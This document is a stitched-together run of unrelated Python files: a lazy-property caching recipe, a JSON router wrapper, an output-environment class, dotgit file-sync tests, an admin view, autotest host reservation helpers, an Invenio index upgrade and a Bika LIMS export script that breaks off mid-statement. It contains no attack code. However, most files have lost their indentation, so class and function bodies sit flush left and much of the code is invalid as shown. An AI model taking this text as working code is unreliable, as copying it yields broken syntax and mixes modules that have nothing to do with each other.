# A descriptor that computes a value once, then caches it by storing the
# result on the instance under the same name; later lookups find the
# instance attribute first and bypass the descriptor entirely.
class lazyproperty:
    def __init__(self, func):
        self.func = func
    def __get__(self, instance, cls):
        if instance is None:
            return self
        else:
            value = self.func(instance)
            # Shadow the descriptor with the computed value.
            setattr(instance, self.func.__name__, value)
            return value
import math
class Circle:
def __init__(self, radius):
self.radius = radius
@lazyproperty
def area(self):
print('Computing area')
return math.pi * self.radius ** 2
@lazyproperty
def perimeter(self):
print('Computing perimeter')
return 2 * math.pi * self.radius
c = Circle(4.0)
print(c.radius)
print(c.area)       # first access: prints 'Computing area', then the value
print(c.area)       # cached: no recomputation
del c.area          # discard the cached value
print(vars(c))      # only 'radius' remains in the instance dict
c.area              # recomputes (prints 'Computing area' again)
print(c.perimeter)  # prints 'Computing perimeter', then the value
print(c.perimeter)  # cached
c.area = 25         # the cached value is a plain attribute and can be overwritten
print(c.area)       # 25
# Variant using a property plus a private '_lazy_' attribute: the value is
# still computed only once, but the property stays in charge of every
# access, so the attribute cannot be overwritten (no setter is defined).
def lazyproperty(func):
    name = '_lazy_' + func.__name__
    @property
    def lazy(self):
        if hasattr(self, name):
            return getattr(self, name)
        else:
            value = func(self)
            setattr(self, name, value)
            return value
    return lazy
class Circle:
def __init__(self, radius):
self.radius = radius
@lazyproperty
def area(self):
print('Computing area')
return math.pi * self.radius ** 2
c = Circle(4.0)
print(c.area)
print(c.area)
c.area = 25  # raises AttributeError: the property defines no setter
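
# Aside (not part of the original recipe): since Python 3.8 the standard
# library ships functools.cached_property, which implements the same
# compute-once-then-shadow trick as the descriptor version above.
import functools

class CachedCircle:
    def __init__(self, radius):
        self.radius = radius
    @functools.cached_property
    def area(self):
        print('Computing area')
        return math.pi * self.radius ** 2

cc = CachedCircle(4.0)
print(cc.area)  # prints 'Computing area', then the value
print(cc.area)  # cached: the value comes straight from the instance dict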
|
'''
JSON router wrapper
'''
from __future__ import absolute_import, print_function, with_statement
from .base import JsonObjectWrapper
__all__ = ('JsonRouterMinimal', 'JsonRouter')
class JsonRouter(JsonObjectWrapper):
'''
JSON wrapper for Router
'''
attributes = (
'name',
'unique_name',
'modified',
'location',
'flags',
'bandwidth',
'policy',
'ip',
'id_hex'
)
def as_dict(self):
result = super(JsonRouter, self).as_dict()
result['id'] = result.pop('id_hex')[1:]
return result
class JsonRouterMinimal(JsonRouter):
'''
Minimal JSON wrapper for router.
'''
attributes = (
'name',
'id_hex',
'ip',
'location'
)
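
# Illustrative note (not from the original module): assuming the base
# class's as_dict() simply collects the attributes listed above, the
# override in JsonRouter renames 'id_hex' to 'id' and strips its leading
# '$' prefix, e.g.
#   {'id_hex': '$ABCD1234EF', ...}  ->  {'id': 'ABCD1234EF', ...}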
|
"""
Created on Thu Mar 10 00:09:52 2016
@author: Zahari Kassabov
"""
import pathlib
import logging
from collections.abc import Sequence
import shutil
log = logging.getLogger(__name__)
class EnvironmentError_(Exception): pass
available_figure_formats = {
'eps': 'Encapsulated Postscript',
'jpeg': 'Joint Photographic Experts Group',
'jpg': 'Joint Photographic Experts Group',
'pdf': 'Portable Document Format',
'pgf': 'PGF code for LaTeX',
'png': 'Portable Network Graphics',
'ps': 'Postscript',
'raw': 'Raw RGBA bitmap',
'rgba': 'Raw RGBA bitmap',
'svg': 'Scalable Vector Graphics',
'svgz': 'Scalable Vector Graphics',
'tif': 'Tagged Image File Format',
'tiff': 'Tagged Image File Format'
}
class Environment:
def __init__(self, *, output=None, formats=('pdf',),
default_figure_format=None, loglevel=logging.DEBUG,
config_yml=None,
folder_prefix=False,
**kwargs):
if output:
self.output_path = pathlib.Path(output).absolute()
else:
self.output_path = output
self.figure_formats = formats
self._default_figure_format = default_figure_format
self.loglevel = loglevel
self.extra_args = kwargs
self.config_yml = config_yml
if folder_prefix and config_yml:
self.filename_prefix = pathlib.Path(config_yml).stem
else:
self.filename_prefix = None
@property
def figure_formats(self):
return self._figure_formats
@property
def default_figure_format(self):
if self._default_figure_format is None:
return self.figure_formats[0]
else:
return self._default_figure_format
@property
def config_rel_path(self):
"""A relative path with respect to the config file, or the current
PWD as a fallback."""
if self.config_yml:
return pathlib.Path(self.config_yml).parent
return pathlib.Path('.')
@default_figure_format.setter
def default_figure_format(self, fmt):
self._default_figure_format = fmt
@figure_formats.setter
def figure_formats(self, figure_formats):
if isinstance(figure_formats, str):
figure_formats = (figure_formats,)
if not isinstance(figure_formats, Sequence):
raise EnvironmentError_("Bad figure format specification: %s. "
"Must be a string or a list." % figure_formats)
bad_formats = set(figure_formats) - set(available_figure_formats)
if bad_formats:
raise EnvironmentError_("The following are not valid figure"
"formats %s:\nIt must be one of:\n%s" % (bad_formats,
'\n'.join('%s: %s'%(k,v) for k,v in available_figure_formats.items())))
self._figure_formats = figure_formats
def init_output(self):
if self.output_path and self.output_path.is_dir():
log.warning("Output folder exists: %s Overwriting contents" %
self.output_path)
else:
try:
self.output_path.mkdir()
except OSError as e:
raise EnvironmentError_(e) from e
self.input_folder = self.output_path/'input'
self.input_folder.mkdir(exist_ok=True)
if self.config_yml:
try:
shutil.copy2(self.config_yml, self.input_folder/'runcard.yaml')
except shutil.SameFileError:
pass
#TODO: Decide if we want to create these always or not
self.figure_folder = (self.output_path/'figures')
self.figure_folder.mkdir(exist_ok=True)
self.table_folder = (self.output_path/'tables')
self.table_folder.mkdir(exist_ok=True)
def get_figure_paths(self, handle):
for fmt in self.figure_formats:
yield self.figure_folder / (handle + '.' + fmt)
@classmethod
def ns_dump_description(cls):
return dict(
output_path = "Folder where the results are to be written.",
config_rel_path = cls.config_rel_path.__doc__,
filename_prefix = "Prefix prepended to filenames",
)
def ns_dump(self):
return {k: getattr(self, k) for k in self.ns_dump_description()
if getattr(self, k) is not None}
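
# Usage sketch (hypothetical paths; relies only on the constructor and
# helpers defined above):
#
#   env = Environment(output='report', formats=('pdf', 'png'),
#                     config_yml='runcard.yaml', folder_prefix=True)
#   env.init_output()                  # creates report/, report/input/, figures/, tables/
#   env.default_figure_format          # 'pdf' (first entry of formats)
#   list(env.get_figure_paths('fit'))  # [.../figures/fit.pdf, .../figures/fit.png]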
|
import os
from pathlib import Path
from dotgit.calc_ops import CalcOps
from dotgit.file_ops import FileOps
from dotgit.plugins.plain import PlainPlugin
class TestCalcOps:
def setup_home_repo(self, tmp_path):
os.makedirs(tmp_path / 'home')
os.makedirs(tmp_path / 'repo')
return tmp_path/'home', tmp_path/'repo'
def test_update_no_cands(self, tmp_path, caplog):
home, repo = self.setup_home_repo(tmp_path)
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']})
assert 'unable to find any candidates' in caplog.text
def test_update_master_noslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
def test_update_nomaster_slave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat2')
open(repo / 'cat2' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
def test_update_master_linkedslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
os.makedirs(repo / 'cat2')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(Path('..') / 'cat1' / 'file', repo / 'cat2' / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
assert calc.update({'file': ['cat1', 'cat2']}).ops == []
def test_update_master_brokenlinkslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
os.makedirs(repo / 'cat2')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(Path('..') / 'cat1' / 'nonexistent', repo / 'cat2' / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
def test_update_home_nomaster_noslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
assert not (home / 'file').exists()
def test_update_linkedhome_master_noslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(repo / 'cat1' / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
assert (home / 'file').is_symlink()
assert (home / 'file').samefile(repo / 'cat1' / 'file')
def test_update_externallinkedhome_nomaster_noslave(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
(home / 'foo').touch()
(home / 'file').symlink_to(home / 'foo')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat']}).apply()
assert (repo / 'cat').is_dir()
assert (repo / 'cat' / 'file').exists()
assert not (repo / 'cat' / 'file').is_symlink()
calc.restore({'file': ['cat']}).apply()
assert (home / 'file').is_symlink()
assert (home / 'file').samefile(repo / 'cat' / 'file')
assert repo in (home / 'file').resolve().parents
assert (home / 'foo').exists()
assert not (home / 'foo').is_symlink()
def test_update_changed_master(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat2')
os.makedirs(repo / 'cat3')
open(repo / 'cat2' / 'file', 'w').close()
os.symlink(Path('..') / 'cat2' / 'file', repo / 'cat3' / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2', 'cat3']}).apply()
assert (repo / 'cat1').is_dir()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2').is_dir()
assert (repo / 'cat2' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').samefile(repo / 'cat1' / 'file')
assert (repo / 'cat3').is_dir()
assert (repo / 'cat3' / 'file').is_symlink()
assert (repo / 'cat3' / 'file').samefile(repo / 'cat1' / 'file')
def test_update_multiple_candidates(self, tmp_path, monkeypatch):
home, repo = self.setup_home_repo(tmp_path)
(repo / 'cat1').mkdir()
(repo / 'cat2').mkdir()
(repo / 'cat1' / 'file').write_text('file1')
(repo / 'cat2' / 'file').write_text('file2')
monkeypatch.setattr('builtins.input', lambda p: '1')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.update({'file': ['cat1', 'cat2']}).apply()
assert (repo / 'cat1' / 'file').exists()
assert not (repo / 'cat1' / 'file').is_symlink()
assert (repo / 'cat2' / 'file').is_symlink()
def test_restore_nomaster_nohome(self, tmp_path, caplog):
home, repo = self.setup_home_repo(tmp_path)
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert 'unable to find "file" in repo, skipping' in caplog.text
assert not (home / 'file').is_file()
def test_restore_nomaster_home(self, tmp_path, caplog):
home, repo = self.setup_home_repo(tmp_path)
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert 'unable to find "file" in repo, skipping' in caplog.text
assert (home / 'file').is_file()
def test_restore_master_nohome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert (home / 'file').is_symlink()
assert (home / 'file').samefile(repo / 'cat1' / 'file')
assert not (repo / 'cat1' / 'file').is_symlink()
def test_restore_master_linkedhome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(repo / 'cat1' / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
fops = calc.restore({'file': ['cat1', 'cat2']})
assert fops.ops == []
def test_restore_master_home_replace(self, tmp_path, monkeypatch):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
open(home / 'file', 'w').close()
monkeypatch.setattr('builtins.input', lambda p: 'y')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert (home / 'file').is_symlink()
assert (home / 'file').samefile(repo / 'cat1' / 'file')
assert not (repo / 'cat1' / 'file').is_symlink()
def test_restore_master_home_noreplace(self, tmp_path, monkeypatch):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
open(home / 'file', 'w').close()
monkeypatch.setattr('builtins.input', lambda p: 'n')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert not (home / 'file').is_symlink()
assert (repo / 'cat1' / 'file').is_file()
assert not (repo / 'cat1' / 'file').is_symlink()
def test_restore_dangling_home(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat')
(repo / 'cat' / 'foo').touch()
(home / 'foo').symlink_to('/non/existent/path')
assert not (home / 'foo').exists()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.restore({'foo': ['cat']}).apply()
assert (home / 'foo').is_symlink()
assert (home / 'foo').exists()
def test_clean_nohome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert not (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_linkedhome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(repo / 'cat1' / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert not (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_linkedotherhome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(Path('cat1') / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_symlink()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_filehome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert not (home / 'file').is_symlink()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_norepo_filehome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert not (home / 'file').is_symlink()
assert not (repo / 'cat1' / 'file').exists()
def test_clean_hard_nohome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert not (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_hard_linkedhome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
os.symlink(repo / 'cat1' / 'file', home / 'file')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.clean({'file': ['cat1', 'cat2']}).apply()
# shouldn't remove symlinks since they are not hard-copied files from
# the repo
assert (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_hard_filehome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
open(home / 'file', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert not (home / 'file').is_file()
assert (repo / 'cat1' / 'file').is_file()
def test_clean_hard_difffilehome(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file', 'w').close()
with open(home / 'file', 'w') as f:
f.write('test data')
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.clean({'file': ['cat1', 'cat2']}).apply()
assert (home / 'file').is_file()
assert (home / 'file').read_text() == 'test data'
assert (repo / 'cat1' / 'file').is_file()
def test_clean_repo(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
open(repo / 'cat1' / 'file1', 'w').close()
open(repo / 'cat1' / 'file2', 'w').close()
os.makedirs(repo / 'cat2')
open(repo / 'cat2' / 'file1', 'w').close()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean_repo(['cat1/file1']).apply()
assert (repo / 'cat1' / 'file1').is_file()
assert not (repo / 'cat1' / 'file2').is_file()
assert not (repo / 'cat2' / 'file1').is_file()
def test_clean_repo_dirs(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1' / 'empty')
assert (repo / 'cat1' / 'empty').is_dir()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean_repo([]).apply()
assert not (repo / 'cat1' / 'empty').is_dir()
def test_clean_repo_categories(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
os.makedirs(repo / 'cat1')
assert (repo / 'cat1').is_dir()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data'))
calc.clean_repo([]).apply()
assert not (repo / 'cat1').is_dir()
def test_diff(self, tmp_path):
home, repo = self.setup_home_repo(tmp_path)
(home / 'file').touch()
(home / 'file2').touch()
calc = CalcOps(repo, home, PlainPlugin(tmp_path / '.data', hard=True))
calc.update({'file': ['common'], 'file2': ['common']}).apply()
calc.restore({'file': ['common'], 'file2': ['common']}).apply()
(home / 'file').write_text('hello world')
(home / 'file2').unlink()
assert calc.diff(['common']) == [f'modified {home / "file"}']
|
from paramecio.citoplasma.generate_admin_class import GenerateAdminClass
from paramecio.citoplasma.lists import SimpleList
from paramecio.citoplasma.urls import make_url
from modules.pastafari.models import servers, tasks
from settings import config
from bottle import request, redirect
def admin(**args):
    t = args['t']
    conn = args['connection']
    url = make_url(config.admin_folder + '/pastafari/os')
    os = servers.OsServer(conn)
    admin = GenerateAdminClass(os, url, t)
    return admin.show()
|
__author__ = "Julius Gawlas <julius.gawlas@hp.com>"
from autotest.frontend.afe import models
__all__ = ['create', 'release']
def get_user(username=None):
'''
Get the specified user object, or the current user if none is given
:param username: login of the user reserving hosts
:type username: str
:returns: the user object for the given username
:rtype: :class:`models.User`
'''
if username:
user = models.User.objects.get(login=username)
else:
user = models.User.current_user()
return user
def create(hosts_to_reserve, username=None):
"""
Reserve hosts for user
:param hosts_to_reserve: strings or idents for hosts to reserve
:type hosts_to_reserve: list
:param username: login of the user reserving hosts
:type username: str
:raises: AclAccessViolation if user cannot reserve all specified hosts
"""
hosts = models.Host.smart_get_bulk(hosts_to_reserve)
if not hosts:
raise Exception("At least one host must be specified")
# check if this user can access specified hosts
user = get_user(username)
models.AclGroup.check_for_acl_violation_hosts(hosts, user.login)
user_acl, created = models.AclGroup.objects.get_or_create(name=user.login)
if created:
user_acl.users = [user]
user_acl.save()
for host in hosts:
host.aclgroup_set.add(user_acl)
# and add to reservation acl
user_acl.hosts.add(*hosts)
user_acl.on_host_membership_change()
def release(hosts_to_release, username=None):
"""
Release a collection of hosts from user
It's OK if the user does not own these systems; in that case this does nothing
:param hosts_to_release: strings or idents for hosts to release
:type hosts_to_release: list
:param username: login of the user reserving hosts
:type username: str
"""
hosts = models.Host.smart_get_bulk(hosts_to_release)
if not hosts:
raise Exception("At least one host must be specified")
user = get_user(username)
acls = models.AclGroup.objects.filter(name=user.login)
if acls:
user_acl = acls[0]
user_acl.hosts.remove(*hosts)
user_acl.on_host_membership_change()
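
# Usage sketch (hypothetical host name; assumes this module is importable
# as `reservations`):
#
#   reservations.create(['host1.example.com'], username='jdoe')
#   ...run jobs on the reserved machine...
#   reservations.release(['host1.example.com'], username='jdoe')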
|
from invenio.dbquery import run_sql
depends_on = ['invenio_2013_08_20_bibauthority_updates']
def info():
return """Introduces new index: itemcount"""
def do_upgrade():
pass
def do_upgrade_atlantis():
#first step: create tables
run_sql("""CREATE TABLE IF NOT EXISTS idxWORD24F (
id mediumint(9) unsigned NOT NULL auto_increment,
term varchar(50) default NULL,
hitlist longblob,
PRIMARY KEY (id),
UNIQUE KEY term (term)
) ENGINE=MyISAM; """)
run_sql("""CREATE TABLE IF NOT EXISTS idxWORD24R (
id_bibrec mediumint(9) unsigned NOT NULL,
termlist longblob,
type enum('CURRENT','FUTURE','TEMPORARY') NOT NULL default 'CURRENT',
PRIMARY KEY (id_bibrec,type)
) ENGINE=MyISAM;""")
run_sql("""CREATE TABLE IF NOT EXISTS idxPAIR24F (
id mediumint(9) unsigned NOT NULL auto_increment,
term varchar(100) default NULL,
hitlist longblob,
PRIMARY KEY (id),
UNIQUE KEY term (term)
) ENGINE=MyISAM;""")
run_sql("""CREATE TABLE IF NOT EXISTS idxPAIR24R (
id_bibrec mediumint(9) unsigned NOT NULL,
termlist longblob,
type enum('CURRENT','FUTURE','TEMPORARY') NOT NULL default 'CURRENT',
PRIMARY KEY (id_bibrec,type)
) ENGINE=MyISAM;""")
run_sql("""CREATE TABLE IF NOT EXISTS idxPHRASE24F (
id mediumint(9) unsigned NOT NULL auto_increment,
term text default NULL,
hitlist longblob,
PRIMARY KEY (id),
KEY term (term(50))
) ENGINE=MyISAM;""")
run_sql("""CREATE TABLE IF NOT EXISTS idxPHRASE24R (
id_bibrec mediumint(9) unsigned NOT NULL,
termlist longblob,
type enum('CURRENT','FUTURE','TEMPORARY') NOT NULL default 'CURRENT',
PRIMARY KEY (id_bibrec,type)
) ENGINE=MyISAM;""")
#second step: fill in idxINDEX, idxINDEX_field, field tables
run_sql("""INSERT INTO field VALUES (37,'item count','itemcount')""") # kwalitee: disable=sql
run_sql("""INSERT INTO idxINDEX VALUES (24,'itemcount','This index contains number of copies of items in the library.','0000-00-00 00:00:00', '', 'native', '','No','No','No', 'BibIndexItemCountTokenizer')""") # kwalitee: disable=sql
run_sql("""INSERT INTO idxINDEX_field (id_idxINDEX, id_field) VALUES (24,37)""")
def estimate():
return 1
def pre_upgrade():
pass
def post_upgrade():
pass
|
from AccessControl.SecurityManagement import newSecurityManager
from Products.Archetypes import Field
from Products.CMFCore.utils import getToolByName
import argparse
import openpyxl
import os
import shutil
import tempfile
import zipfile
export_types = [
'Client',
'Contact',
'ARPriority',
'AnalysisProfile',
'ARTemplate',
'AnalysisCategory',
'AnalysisService',
'AnalysisSpec',
'AttachmentType',
'BatchLabel',
'Calculation',
'Container',
'ContainerType',
'Department',
'Instrument',
'InstrumentCalibration',
'InstrumentCertification',
'InstrumentMaintenanceTask',
'InstrumentScheduledTask',
'InstrumentType',
'InstrumentValidation',
'LabContact',
'LabProduct',
'Manufacturer',
'Method',
'Preservation',
'ReferenceDefinition',
'SampleCondition',
'SampleMatrix',
'StorageLocation',
'SamplePoint',
'SampleType',
'SamplingDeviation',
'SRTemplate',
'SubGroup',
'Supplier',
'SupplierContact',
'WorksheetTemplate',
#
'ARReport',
'Analysis',
'AnalysisRequest',
'Attachment',
'Batch',
'BatchFolder',
'Calculations',
'ClientFolder',
'DuplicateAnalysis',
'Invoice',
'InvoiceBatch',
'Pricelist',
'ReferenceAnalysis',
'ReferenceSample',
'RejectAnalysis',
'Sample',
'SamplePartition',
'SupplyOrder',
'SupplyOrderItem',
'Worksheet'
]
ignore_fields = [
# dublin
'constrainTypesMode',
'locallyAllowedTypes',
'immediatelyAddableTypes',
'subject',
'relatedItems',
'location',
'language',
'effectiveDate',
'modification_date',
'expirationDate',
'creators',
'contributors',
'rights',
'allowDiscussion',
'excludeFromNav',
'nextPreviousEnabled',
]
app = app # flake8: noqa
class Main:
def __init__(self, args):
self.args = args
# pose as user
self.user = app.acl_users.getUserById(args.username)
newSecurityManager(None, self.user)
# get portal object
self.portal = app.unrestrictedTraverse(args.sitepath)
self.proxy_cache = {}
def __call__(self):
"""Export entire bika site
"""
self.tempdir = tempfile.mkdtemp()
# Export into tempdir
self.wb = openpyxl.Workbook()
self.export_laboratory()
self.export_bika_setup()
for portal_type in export_types:
self.export_portal_type(portal_type)
self.wb.save(os.path.join(self.tempdir, 'setupdata.xlsx'))
# Create zip file
zf = zipfile.ZipFile(self.args.outputfile, 'w', zipfile.ZIP_DEFLATED)
for fname in os.listdir(self.tempdir):
zf.write(os.path.join(self.tempdir, fname), fname)
zf.close()
# Remove tempdir
shutil.rmtree(self.tempdir)
def get_catalog(self, portal_type):
# grab the first catalog we are indexed in
at = getToolByName(self.portal, 'archetype_tool')
return at.getCatalogsByType(portal_type)[0]
def get_fields(self, schema):
fields = []
for field in schema.fields():
if field.getName() in ignore_fields:
continue
if Field.IComputedField.providedBy(field):
continue
fields.append(field)
return fields
def write_dict_field_values(self, instance, field):
value = field.get(instance)
if type(value) == dict:
value = [value]
keys = value[0].keys()
# Create or obtain sheet for this field type's values
sheetname = '%s_values' % field.type
sheetname = sheetname[:31]
if sheetname in self.wb:
ws = self.wb[sheetname]
else:
ws = self.wb.create_sheet(title=sheetname)
ws.page_setup.fitToHeight = 0
ws.page_setup.fitToWidth = 1
ws.cell(column=1, row=1).value = "id"
ws.cell(column=2, row=1).value = "field"
for col, key in enumerate(keys):
cell = ws.cell(column=col + 3, row=1)
cell.value = key
nr_rows = len(ws.rows) + 1
for row, v in enumerate(value):
if not any(v.values()):
break
# source id/field
ws.cell(column=1, row=nr_rows + row).value = instance.id
ws.cell(column=2, row=nr_rows + row).value = field.getName()
for col, key in enumerate(keys):
c_value = v.get(key, '')
ws.cell(column=col + 3, row=nr_rows + row).value = c_value
return sheetname
def write_reference_values(self, instance, field):
values = field.get(instance)
# Create or obtain sheet for this relationship
sheetname = field.relationship[:31]
if sheetname in self.wb:
ws = self.wb[sheetname]
else:
ws = self.wb.create_sheet(title=sheetname)
ws.cell(column=1, row=1).value = "Source"
ws.cell(column=2, row=1).value = "Target"
nr_rows = len(ws.rows) + 1
for row, value in enumerate(values):
ws.cell(column=1, row=nr_rows + row).value = instance.id
ws.cell(column=2, row=nr_rows + row).value = value.id
return sheetname
def get_extension(self, mimetype):
"""Return first extension for mimetype, if any is found.
If no extension found, return ''
"""
mr = getToolByName(self.portal, "mimetypes_registry")
extension = ''
for ext, mt in mr.extensions.items():
if mimetype == mt:
extension = ext
return extension
def mutate(self, instance, field):
value = field.get(instance)
# Booleans are special; we'll str and return them.
if value is True or value is False:
return str(value)
# Zero is special: it's false-ish, but the value is important.
if value == 0:
return 0
# Other falsish values make empty cells.
if not value:
return ''
# Date fields are rendered as RFC 2822 strings
if Field.IDateTimeField.providedBy(field):
return value.rfc822() if value else None
# TextField implements IFileField, so we must handle it
# before IFileField. It's just returned verbatim.
elif Field.ITextField.providedBy(field):
return value
# Files get saved into tempdir, and the cell content is the filename
elif Field.IFileField.providedBy(field):
if not value.size:
return ''
extension = self.get_extension(value.content_type)
filename = value.filename if value.filename \
else instance.id + '-' + field.getName() + "." + extension
of = open(os.path.join(self.tempdir, filename), 'wb')
of.write(value.data)
of.close()
return filename
elif Field.IReferenceField.providedBy(field):
if field.multiValued:
return self.write_reference_values(instance, field)
else:
return value.id
elif Field.ILinesField.providedBy(field):
return "\n".join(value)
# Otherwise, inspect the value itself to decide the mutation.
else:
value = field.get(instance)
# Dictionaries or lists of dictionaries
if type(value) == dict \
or (type(value) in (list, tuple)
